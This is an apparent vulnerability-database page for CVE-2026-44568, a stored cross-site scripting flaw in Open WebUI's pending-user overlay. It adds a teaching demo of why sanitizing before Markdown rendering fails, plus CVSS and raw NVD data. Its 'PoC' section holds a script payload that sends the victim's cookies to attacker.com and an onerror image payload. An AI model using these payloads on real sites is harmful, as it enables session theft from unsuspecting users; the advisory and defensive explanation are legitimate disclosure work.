Security Vulnerability Report
CVE-2026-44568 CVSS 4.8 MEDIUM

Published: 2026-05-15 20:16:48
Last Modified: 2026-05-15 21:16:36

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the AccountPending.svelte component renders the admin-configured "Pending User Overlay Content" using marked.parse() inside {@html} with an incorrect DOMPurify application order. An admin can inject arbitrary JavaScript into the Pending User Overlay Content that executes in the browser context of any pending user who views the overlay page. This vulnerability is fixed in 0.9.0.
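Added example, not code from the advisory or from the Open WebUI code base: the JavaScript below uses two constructed stand-ins for marked.parse() and DOMPurify.sanitize() (a toy Markdown renderer and a toy sanitizer) to show why the order of the two calls matters for content that ends up in {@html}. Sanitizing the Markdown source and then rendering it lets the renderer emit HTML the sanitizer never inspected; here a Markdown link whose target becomes a javascript: URL. Rendering first and sanitizing the resulting HTML neutralizes it. The overlay strings are constructed samples, the stand-ins are not the real libraries and are not sanitizers to deploy, and the record does not say which Markdown construct was the actual vector in Open WebUI; the example illustrates the general failure mode the description names.

```javascript
// Added example: constructed stand-ins for marked.parse() and DOMPurify.sanitize(),
// written only to show why the order of "render Markdown" and "sanitize HTML" matters
// for content handed to {@html}. Not the real libraries; not a production sanitizer.

// Toy Markdown renderer: blank-line-separated paragraphs, [text](url) links, and raw
// HTML passed through unchanged (marked's default behaviour for inline HTML).
function renderMarkdown(md) {
  return md
    .split(/\n{2,}/)
    .map(block => block.trim())
    .filter(block => block.length > 0)
    .map(block => {
      // A link ends at ")" followed by whitespace, end of block or a tag, so the
      // URL itself may contain parentheses.
      const html = block.replace(/\[([^\]]*)\]\((\S+?)\)(?=\s|$|<)/g,
        (m, text, href) => `<a href="${href}">${text}</a>`);
      return `<p>${html}</p>`;
    })
    .join('\n');
}

// Toy HTML sanitizer: drops <script> elements, on* event-handler attributes and
// javascript: URLs in href/src. Regex sanitization is acceptable only for this
// illustration; real code must run DOMPurify (or equivalent) over the final HTML.
function sanitizeHtml(html) {
  return html
    .replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '')
    .replace(/\s+on[a-z]+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, '')
    .replace(/\b(href|src)\s*=\s*("|')?\s*javascript:[^"'\s>]*\2?/gi, '$1="#"');
}

// Incorrect order: the sanitizer sees Markdown text, not the HTML it will become.
function renderOverlayVulnerable(markdown) {
  return renderMarkdown(sanitizeHtml(markdown));
}

// Correct order: sanitize the exact HTML string that will be handed to {@html}.
function renderOverlayFixed(markdown) {
  return sanitizeHtml(renderMarkdown(markdown));
}

// Detection helper: does the HTML still carry anything that can execute in the
// viewer's browser?
function containsActiveContent(html) {
  return /<script\b/i.test(html) || /\son[a-z]+\s*=/i.test(html) || /javascript:/i.test(html);
}

// Runs both orders over one overlay string and reports the outcome of each.
function compareOrders(markdown) {
  const vulnerable = renderOverlayVulnerable(markdown);
  const fixed = renderOverlayFixed(markdown);
  return {
    vulnerable,
    fixed,
    vulnerableActive: containsActiveContent(vulnerable),
    fixedActive: containsActiveContent(fixed),
  };
}

// Constructed sample overlay content. The javascript: link is the case the wrong
// order misses: the sanitizer sees plain text, then the renderer turns it into a
// live href. void(0) is a harmless placeholder; any javascript: URL would run in the
// pending user's browser context when clicked.
const SAMPLE_LINK = 'Your account is pending approval.\n\n[Check status](javascript:void(0))';

// The obvious payload is stripped in both orders, which is why an ordering bug
// survives a quick manual test with a <script> tag.
const SAMPLE_SCRIPT = 'Your account is pending approval.\n\n<script>console.log("x")</script>';

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, sample] of [['javascript: link', SAMPLE_LINK], ['script tag', SAMPLE_SCRIPT]]) {
    const r = compareOrders(sample);
    console.log(`${name}: sanitize-then-render active=${r.vulnerableActive}, ` +
                `render-then-sanitize active=${r.fixedActive}`);
  }
}
```

The general defense the record points at is to sanitize the final HTML string, DOMPurify.sanitize(marked.parse(content)), immediately before it reaches {@html}, rather than the Markdown source. When reviewing a component like this, test with Markdown constructs that only become markup after rendering (links, images, autolinks), not only with a literal script tag, since the latter is blocked in both orders.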

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is present in the NVD record; the affected range taken from the description is:

Open WebUI < 0.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- PoC for CVE-2026-44568: an admin injects the following payload into the
     "Pending User Overlay Content" configuration field. -->
<script>
  // Example: steal the pending user's cookies
  fetch('https://attacker.com/log?' + encodeURIComponent(document.cookie))
    .then(response => console.log('Data exfiltrated'));
</script>

<!-- Alternatively, an event-handler payload: markup inserted through innerHTML-style
     APIs does not execute <script> elements, but event handlers such as onerror
     still fire. -->
<img src=x onerror="alert('XSS via CVE-2026-44568'); console.log(document.cookie);">

References

https://github.com/open-webui/open-webui/security/advisories/GHSA-fq3v-xjjx-95rc
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-44568",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-15T20:16:48.263",
    "lastModified": "2026-05-15T21:16:36.277",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the AccountPending.svelte component renders the admin-configured \"Pending User Overlay Content\" using marked.parse() inside {@html} with an incorrect DOMPurify application order. An admin can inject arbitrary JavaScript into the Pending User Overlay Content that executes in the browser context of any pending user who views the overlay page. This vulnerability is fixed in 0.9.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 4.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.7,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-79" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-fq3v-xjjx-95rc",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-fq3v-xjjx-95rc",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}